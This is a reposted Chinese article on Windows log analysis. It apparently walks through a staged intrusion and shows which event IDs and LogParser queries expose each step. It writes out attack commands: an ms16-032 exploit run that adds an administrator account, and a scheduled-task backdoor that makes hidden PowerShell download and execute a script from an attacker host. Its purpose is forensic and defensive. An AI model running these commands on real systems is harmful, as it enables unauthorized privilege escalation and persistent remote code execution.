本文转载自微信公众号《绕过》,作者绕过。转载本文请联系旁路公众号。有朋友问:大部分的Windows系统日志分析只是分析恶意登录事件的案例。是否可以通过系统日志找到其他入侵痕迹?答案是肯定的。攻击者获取到webshel??l后,会通过各种方式执行系统命令。所有的web攻击行为都会保存在web访问日志中,执行操作系统命令的行为也会保存在系统日志中。不同的攻击场景会留下不同的系统日志痕迹,不同的EventID代表不同的含义。需要重点关注一些事件ID,分析攻击者在系统中留下的攻击痕迹。我们通过一个攻击案例分析windows日志,从日志中识别出攻击场景,找到恶意程序执行的痕迹,甚至可以还原出攻击者的行为轨迹。1、信息收集攻击者获得webshel??l权限后,会尝试查询当前用户权限,收集系统版本和补丁信息,用于辅助提权。whoamisysteminfoWindows日志分析:在本地安全策略中,需要开启审计进程跟踪,可以跟踪进程创建/终止。关键进程跟踪事件及描述,如:4688createsanewprocess4689processterminates我们通过LogParser做一个简单的筛选,得到EventID4688,这是创建的新进程列表,用户Bypass可以找到,调用cmd执行whami和systeminfo先后。Conhost.exe进程主要为命令行程序(cmd.exe)提供图形子系统等功能支持。LogParser.exe-i:EVT"SELECTTimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,'|')asUserName,EXTRACT_TOKEN(Strings,5,'|')asProcessNameFROMc:\11.evtxwhereEventID=4688"2.通过执行exp提权提升权限,获取操作系统的系统权限,添加管理用户。ms16-032.exe"whoami"ms16-032.exe"netusertest1abc123!/add"ms16-032.exe"netlocalgroupAdministratorstest1/add"Windows日志分析:在本地安全策略中,需要开启审计账户管理,关键账户管理事件并说明。例如:4720Createduser4732Addedmemberstothesecurity-enabledlocalgroup这里会涉及到流程创建,主要是账号创建和管理用户组变更。从EventID4720开始,系统创建了一个新的test用户,从EventID4732的两条记录的变化中,得到了一个关键信息,将本地用户test从用户组提升为Administrators。3、管理账号登录创建管理账号后,尝试远程登录目标主机获取敏感信息。mstsc/v10.1.1.188Windows日志分析:在本地安全策略中,需要开启审计登录事件,关键登录事件及描述,如:4624登录成功4625登录失败LogParser.exe-i:EVT"SELECTTimeGeneratedasLoginTime,EXTRACT_TOKEN(Strings,8,'|')asEventType,EXTRACT_TOKEN(Strings,5,'|')asusername,EXTRACT_TOKEN(Strings,18,'|')asLoginipFROMC:\3333.evtxwhereEventID=4624"使用LogParser做一些分析获取系统登录时间,登录类型10为远程登录,登录用户test,登录IP:10.1.1.1。4.通过创建定时任务执行脚本后门来维护权限,下次可以直接进入。可以使用如下命令一键实现:schtasks/create/scminute/mo1/tn"SecurityScript"/tr"powershell.exe-nop-whidden-c\"IEX((new-objectnet.webclient).downloadstring(\"\"\"http://10.1.1.1:8888/logo.txt\"\"\"))\""Windows日志分析:本地在安全策略中,审计对象访问和关键对象访问事件需要待启用,如:4698创建计划任务4699删除计划任务这涉及进程创建和对象访问事件,包括schtasks.exe进程的创建和事件ID4698发现新创建的计划任务。成功找到定时任务后门位置:
